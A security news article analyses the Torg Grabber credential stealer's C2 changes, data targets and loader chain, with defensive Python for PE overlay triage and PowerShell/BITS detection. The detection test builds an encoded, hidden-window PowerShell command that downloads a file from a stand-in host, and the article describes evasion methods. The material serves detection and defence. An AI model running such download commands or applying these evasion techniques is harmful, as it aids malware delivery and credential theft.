Torg Grabber Stealer Shifts to Encrypted REST API for C2

Jennifer Sherman
March 26, 2026, 4 Min Read

Key Takeaways

  • Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure.
  • The malware moved from simple Telegram-based exfiltration to an encrypted REST API C2 system over HTTPS within three months.
  • Torg Grabber targets a wide array of sensitive data, including browser credentials, cryptocurrency wallets, 2FA tools, and session data from popular applications like Discord and Steam.
  • The stealer utilizes a multi-stage loader chain and in-memory execution to evade detection, often delivered via fake game cheats or cracked software.

Torg Grabber Stealer Adopts Encrypted REST API for Advanced C2 Operations

A credential-stealing malware family identified as Torg Grabber is rapidly adding capabilities as a Malware-as-a-Service (MaaS) offering. In three months the stealer moved its exfiltration path from Telegram bot channels to an encrypted REST API for command-and-control (C2) communications. The speed of that change is the notable point: the operators rebuilt their C2 twice within ten days of December 2025 before settling on the HTTPS design.

Initially relying on Telegram for exfiltration, Torg Grabber quickly matured to a fully encrypted REST API for its C2 infrastructure. The scale of the operation is visible in the sample set: 334 unique samples compiled during its brief observed lifespan and more than 40 distinct operator tags found embedded in the binaries. That pattern, one builder and many tagged builds, points to an organized builder-based cybercrime operation selling to numerous buyers.

The malware derives its name from one of its primary C2 domains, technologytorg.com, where “torg” is a Russian term signifying “trade” or “marketplace.” This nomenclature is particularly fitting given the malware’s purpose of acquiring and trading stolen credentials.

Discovery and Technical Analysis

The discovery of Torg Grabber began when a sample, initially misidentified as Vidar Stealer, arrived at a research lab. Forensic examination quickly revealed discrepancies: the binary was a 64-bit Portable Executable compiled with MinGW-GCC, contrasting sharply with Vidar’s 32-bit MSVC build. Further analysis uncovered an embedded debug string, “grabber v1.0,” and a C2 protocol utilizing REST API endpoints secured with ChaCha20 encryption and HMAC-SHA256 authentication—architectural elements entirely distinct from Vidar.

Gen Digital’s Threat Research Team was responsible for identifying and formally naming the malware after an in-depth dissection of its binary. Their analysts confirmed that Torg Grabber progressed through three distinct exfiltration phases within its short operational period.

  • Phase 1 (December 9-11, 2025): Early builds transmitted stolen ZIP archives to private Telegram channels via the Telegram Bot API, a method offering speed and requiring minimal infrastructure.
  • Phase 2 (December 17-20, 2025): The malware briefly shifted to a raw TCP socket protocol, employing a custom 9-byte binary frame secured with ChaCha20-Poly1305 encryption.
  • Phase 3 (Beginning December 18, 2025): Torg Grabber moved to a production-grade REST API over HTTPS fronted by Cloudflare. Because the origin server sits behind Cloudflare's shared edge and the traffic looks like ordinary TLS to a CDN, interception and IP-based blocking become harder, leaving the C2 hostname (technologytorg.com, for example) as the main network indicator.

The malware’s data collection capabilities are extensive. It targets credentials from 25 Chromium-based browsers and 8 Firefox-family browsers, harvests data from over 850 browser extensions including cryptocurrency wallets and two-factor authentication (2FA) tools, and captures session data from applications like Discord, Telegram, and Steam. Additionally, it collects VPN configurations, FTP client data, and desktop screenshots. Prior to initiating data collection, Torg Grabber performs an evasion check, scanning for 46 antivirus signatures across 24 different security products to assess the victim’s defenses.

Investigations into the confirmed operator tags linked eight of them to active Telegram accounts associated with Russian-speaking cybercrime networks.

The Loader Chain: From Dropper to In-Memory Execution

Torg Grabber is not deployed as a standalone executable; instead, it is delivered via a sophisticated, multi-stage loader chain designed to evade detection. This chain progressively unpacks the stealer, ensuring it only executes in memory.

The initial stage, referred to as Stage 0, functions as the dropper. Victims typically encounter it through fake game cheats, pirated software packages, or ClickFix-style clipboard injection pages hosted on Google Apps Script. A documented infection on January 30, 2026 involved a malicious webpage silently writing a PowerShell command into the user's clipboard and instructing the user to paste and run it. The command created a BITS transfer job; because the BITS service performs the download from inside a legitimate svchost.exe service host, the network traffic originates from a trusted Windows process and blends with normal system activity, bypassing endpoint tools that key only on the initiating process.

Stage 1 is a self-extracting loader carrying an AES-256-CBC encrypted overlay appended after the last section's raw data, past the point where many PE parsers and scanners stop reading. The loader hex-decodes and then AES-decrypts this payload with its own routines. It avoids a tell-tale import table by invoking Windows NT APIs through direct syscalls resolved at runtime, so static analysis tools see no suspicious imports to flag.
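As an added example (not Gen Digital's tooling and not code from the malware), the following Python script carves a PE's overlay, the region after the last section's raw data, undoes the hex encoding described above, and uses byte entropy to decide whether what remains looks encrypted and is worth handing to a decryptor. The entropy threshold of 7.5 bits per byte, the synthetic PE built by build_sample_pe and the SHA-256-derived bytes that stand in for ciphertext are assumptions for the demonstration; decrypting a real overlay additionally needs the AES key and IV recovered from the loader.

```python
"""Carve and triage a PE overlay: the bytes appended after the last section's
raw data, where a loader of the kind described above keeps its hex-encoded,
AES-256-CBC encrypted payload. Added analyst example, not Gen Digital's
tooling or the malware's own code."""
import hashlib
import math
import struct
import sys

HEX_ALPHABET = b"0123456789abcdefABCDEF"
ENTROPY_THRESHOLD = 7.5   # assumption: above this (bits/byte) looks encrypted or compressed


def overlay_offset(pe: bytes) -> int:
    """Return the file offset where the overlay begins: the end of the
    highest-placed section's raw data, or the end of the headers if the
    image has no sections. Parses only the DOS, COFF and section header
    fields it needs, so it works on real files with optional headers too."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]      # SizeOfOptionalHeader
    sect_table = coff + 20 + size_opt
    end = sect_table + nsections * 40
    for i in range(nsections):
        # SizeOfRawData and PointerToRawData sit at +16 in each 40-byte header
        size_raw, ptr_raw = struct.unpack_from("<II", pe, sect_table + i * 40 + 16)
        end = max(end, ptr_raw + size_raw)
    return min(end, len(pe))


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for uniform random)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_overlay(pe: bytes) -> dict:
    """Carve the overlay, undo a hex encoding if present, and score the
    result's entropy to decide whether it is worth handing to a decryptor."""
    start = overlay_offset(pe)
    raw = pe[start:]
    result = {"offset": start, "size": len(raw), "hex_encoded": False,
              "entropy": 0.0, "likely_encrypted": False}
    if not raw:
        return result
    payload = raw
    if len(raw) % 2 == 0 and all(c in HEX_ALPHABET for c in raw):
        result["hex_encoded"] = True
        payload = bytes.fromhex(raw.decode("ascii"))
    ent = shannon_entropy(payload)
    result["entropy"] = round(ent, 2)
    # Short blobs cannot reach high entropy even when random, so require size too.
    result["likely_encrypted"] = ent > ENTROPY_THRESHOLD and len(payload) >= 256
    return result


def build_sample_pe(overlay: bytes) -> bytes:
    """Constructed test input: a minimal x64 PE-shaped buffer with a single
    .text section (and, for brevity, no optional header) followed by the
    given overlay. Not a real sample."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x22)
    section_data = b"\x90" * 0x200
    raw_ptr = 64 + 4 + 20 + 40                                  # headers end here
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + section + section_data + overlay


def constructed_ciphertext(n: int = 4096) -> bytes:
    """Deterministic pseudo-random bytes standing in for AES-CBC output,
    which is statistically indistinguishable from random data."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.sha256(b"overlay-example" + i.to_bytes(4, "little")).digest()
        i += 1
    return bytes(out[:n])


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_sample_pe(constructed_ciphertext().hex().encode("ascii"))
    print(triage_overlay(data))
```

Run it with a file path to triage a real binary; with no arguments it triages the constructed sample. A high-entropy, hex-encoded overlay is the cue to pull the AES key and IV out of the loader's decryption routine and decrypt the carved bytes with a standard AES library.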

Stage 2 operates entirely within memory as a reflective PE loader. This stage maps the final stealer payload directly into memory without writing any components to disk. By the time Stage 3 activates, the Torg Grabber stealer is running within a live process, leaving no persistent files for disk-based scanning or detection.

What You Should Do

  • Exercise Caution with Downloads: Avoid downloading software from untrusted sources, including unofficial game cheat sites, cracked application platforms, and suspicious links.
  • Monitor PowerShell Activity: Security teams should alert on PowerShell launches with encoded arguments (-EncodedCommand and its short forms such as -enc) and on unexpected BITS job creation, which Windows records in the Microsoft-Windows-Bits-Client/Operational log (event ID 3 for job creation, 59 for transfer start with the remote URL).
  • Enhance Endpoint Detection: Configure endpoint security tools to flag direct syscall usage and patterns indicative of in-memory PE loading.
  • Secure Browser Data: For organizations running Chromium-based browsers, make sure App-Bound Encryption (enabled by default in Chrome on Windows since version 127) has not been turned off by policy. It stops a user-level process from simply reading the cookie and password stores, so a stealer must either elevate or tamper with the running browser process to get at them; treat unexplained browser process suspensions or crashes during normal activity as a potential indicator of compromise.
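The PowerShell and BITS monitoring recommended above, as an added example in Python over constructed events (not Gen Digital's detections and not any product's rule syntax). The event field names follow Sysmon's process-creation event, the Bits-Client event ID 59 is taken as the transfer-start record that carries the URL, and the allowlist in BITS_ALLOWED_HOSTS and the .invalid URL in the sample events are assumptions.

```python
"""Detection logic for the two telemetry signals recommended above: encoded
PowerShell launches and BITS transfer jobs. Added example over constructed
events, not Gen Digital's detections or any vendor's rule syntax."""
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
BITS_USAGE = re.compile(
    r"(?i)\b(?:Start-BitsTransfer|bitsadmin(?:\.exe)?|Import-Module\s+BitsTransfer)\b")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")
BITS_CHANNEL = "Microsoft-Windows-Bits-Client/Operational"
# Assumption: hosts from which BITS downloads are expected in this estate.
BITS_ALLOWED_HOSTS = {"download.windowsupdate.com", "update.microsoft.com"}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand is base64 over the UTF-16LE script text; return None
    if the argument does not decode cleanly."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_process_event(ev: Dict) -> List[str]:
    """Reasons to alert on a process-creation event (Sysmon event 1 shaped)."""
    reasons: List[str] = []
    image = ev.get("Image", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return reasons
    cmd = ev.get("CommandLine", "")
    decoded = ""
    m = ENCODED_FLAG.search(cmd)
    if m:
        reasons.append("encoded PowerShell command line")
        decoded = decode_encoded_command(m.group(1)) or ""
        if not decoded:
            reasons.append("encoded argument does not decode as UTF-16LE")
    if BITS_USAGE.search(cmd) or BITS_USAGE.search(decoded):
        reasons.append("BITS transfer started from PowerShell")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
    # Weak signal on its own: a command pasted into the Run dialog (ClickFix)
    # has explorer.exe as parent, but so does a user opening PowerShell normally.
    if reasons and ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("parent is explorer.exe, consistent with a pasted command")
    return reasons


def analyze_bits_event(ev: Dict) -> List[str]:
    """Alert on BITS transfer-start events (ID 59, which carries the remote
    URL) whose host is outside the allowlist."""
    if ev.get("Channel") != BITS_CHANNEL or ev.get("EventID") != 59:
        return []
    host = (urlparse(ev.get("URL", "")).hostname or "").lower()
    if host in BITS_ALLOWED_HOSTS:
        return []
    return [f"BITS transfer from non-allowlisted host {host or '<none>'}"]


def run_detections(events: List[Dict]) -> List[tuple]:
    """Return (EventID, reasons) for every event that trips at least one rule."""
    alerts = []
    for ev in events:
        reasons = analyze_process_event(ev) + analyze_bits_event(ev)
        if reasons:
            alerts.append((ev.get("EventID"), reasons))
    return alerts


def encode_for_powershell(script: str) -> str:
    """What an attacker passes to -enc; used here only to build test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; the URL uses the reserved .invalid TLD and is not a real C2.
SAMPLE_EVENTS = [
    {"EventID": 1, "Channel": "Microsoft-Windows-Sysmon/Operational", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
         "Start-BitsTransfer -Source https://cdn.example.invalid/u.bin "
         "-Destination $env:TEMP\\u.bin")},
    {"EventID": 1, "Channel": "Microsoft-Windows-Sysmon/Operational", "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 59, "Channel": BITS_CHANNEL, "URL": "https://cdn.example.invalid/u.bin"},
    {"EventID": 59, "Channel": BITS_CHANNEL,
     "URL": "http://download.windowsupdate.com/msdownload/update/x.cab"},
]

if __name__ == "__main__":
    for event_id, reasons in run_detections(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

The point of decoding the argument rather than merely flagging its presence is that the BITS cmdlet never appears in the raw command line of an encoded launch; only the decoded UTF-16LE text reveals it. In production the same two checks correlate naturally: the process event gives the pasted command and the Bits-Client event a few seconds later gives the URL the svchost.exe-hosted service actually fetched.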


Tags: Attack, Malware, Security, Threat
